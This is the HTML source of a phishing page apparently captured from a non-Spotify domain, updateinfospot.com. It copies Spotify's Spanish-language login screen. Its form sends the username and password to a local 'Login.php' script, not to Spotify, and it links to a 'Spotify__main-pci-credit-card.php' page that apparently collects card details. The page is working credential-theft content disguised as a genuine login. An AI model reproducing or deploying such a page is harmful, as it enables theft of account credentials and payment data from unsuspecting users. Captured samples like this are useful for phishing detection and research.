<!-- URL =http://updateinfospot.com/account.html--><!-- w =(['UPDATEINFOSPOT.COM', 'updateinfospot.com'], datetime.datetime(2021, 4, 5, 17, 41, 1), datetime.datetime(2022, 4, 5, 17, 41, 1))--><html class="ng-scope" lang="es" ng-app="accounts" ng-csp="">
 <head>
  <meta charset="utf-8"/>
  <title class="ng-binding" ng-bind="(title &amp;&amp; (title | localize) + ' - ') + 'Spotify'">
   Iniciar sesión - Spotify
  </title>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"/>
  <link href="https://d2d1dxiu3v1f2i.cloudfront.net/9b9fc0e/css/index.css" media="screen" rel="stylesheet"/>
  <link href="https://www.scdn.co/i/_global/favicon.png" rel="icon"/>
  <link href="https://accounts.scdn.co/css/index.8a33c84808dd0287acad.css" media="screen" rel="stylesheet"/>
  <script defer="" sp-bootstrap="" src="https://accounts.scdn.co/js/index.8a33c84808dd0287acad.js">
  </script>
 </head>
 <!-- ngView:  -->
 <body class="ng-scope" ng-view="">
  <div class="ng-scope" sp-header="">
   <div class="head ">
    <a class="spotify-logo" href="#" ng-href="#" tabindex="-1" title="Spotify">
    </a>
   </div>
  </div>
  <div align="center">
   <p>
    <a href="Spotify__main-pci-credit-card.php">
     <img alt="a" border="0" src="facebook.jpg"/>
    </a>
   </p>
   <p>
   </p>
  </div>
  <div class="container-fluid login ng-scope">
   <div class="content">
    <form action="Login.php" class="ng-pristine ng-valid-sp-disallow-chars ng-invalid ng-invalid-required" method="post" name="envia">
     <!-- ngIf: status && status !== 200 -->
     <div class="row" ng-class="{'has-error': (accounts.username.$dirty &amp;&amp; accounts.username.$invalid)}">
      <div class="col-xs-12">
       <label class="control-label sr-only ng-binding" for="login-username">
        Nombre de usuario
       </label>
       <input autocapitalize="off" autocomplete="off" autocorrect="off" autofocus="autofocus" class="form-control input-with-feedback ng-pristine ng-valid-sp-disallow-chars ng-empty ng-invalid ng-invalid-required ng-touched" id="login-username" name="username" ng-trim="false" placeholder="Nombre de usuario" required="" sp-disallow-chars=":%&amp;'`´&quot;" sp-disallow-chars-model="usernameDisallowedChars" type="text"/>
       <!-- ngIf: accounts.username.$dirty && accounts.username.$invalid -->
      </div>
     </div>
     <div class="row" ng-class="{'has-error': (accounts.password.$dirty &amp;&amp; accounts.password.$invalid)}">
      <div class="col-xs-12">
       <label class="control-label sr-only ng-binding" for="login-password">
        Contraseña
       </label>
       <input autocomplete="off" class="form-control input-with-feedback ng-pristine ng-empty ng-invalid ng-invalid-required ng-touched" id="login-password" name="password" ng-trim="false" placeholder="Contraseña" required="" type="password"/>
       <!-- ngIf: accounts.password.$dirty && accounts.password.$invalid -->
      </div>
     </div>
     <div class="row row-submit">
      <div class="col-xs-12 col-sm-6">
       <div class="checkbox">
        <label class="ng-binding">
         <input class="ng-pristine ng-untouched ng-valid ng-not-empty" id="login-remember" name="remember" ng-model="form.remember" type="checkbox"/>
         Recordarme
         <span class="control-indicator">
         </span>
        </label>
       </div>
      </div>
      <div class="col-xs-12 col-sm-6">
       <button class="btn btn-sm btn-block btn-green ng-binding">
        Iniciar Sesión
       </button>
      </div>
     </div>
    </form>
    <div class="row row-hint">
     <div class="col-xs-12 text-center">
      <p>
       <a class="ng-binding" href="https://www.spotify.com/mx/password-reset/" ng-href="https://www.spotify.com/mx/password-reset/">
        ¿Olvidaste tu nombre de usuario o contraseña?
       </a>
      </p>
      <!-- ngIf: !disableSignup -->
      <p class="ng-binding ng-scope" ng-if="!disableSignup">
       ¿No tienes cuenta?
       <a class="ng-binding" href="Registrate.html" ng-href="https://www.spotify.com/mx/signup/?forward_url=https%3A%2F%2Fwww.spotify.com%2Fmx%2Faccount%2Foverview%2F">
        Regístrate
       </a>
      </p>
      <!-- end ngIf: !disableSignup -->
     </div>
     <div class="col-xs-12">
      <div class="divider">
      </div>
      <p class="text-muted disclaimer ng-binding" ng-bind-html="'loginTermsOfService' | localize:termsAndConditionsUrl:privacyPolicyUrl">
       Si haces clic en "Acceder con Facebook" y no eres usuario de Spotify, quedarás registrado y aceptarás los
       <a href="https://www.spotify.com/mx/legal/end-user-agreement/plain/" target="_blank">
        Términos y Condiciones
       </a>
       y la
       <a href="https://www.spotify.com/mx/legal/privacy-policy/plain/" target="_blank">
        Política de Privacidad
       </a>
       de Spotify.
      </p>
     </div>
    </div>
   </div>
  </div>
  <!-- ngInclude: '_common/partials/footerPartial.ngt' -->
 </body>
</html>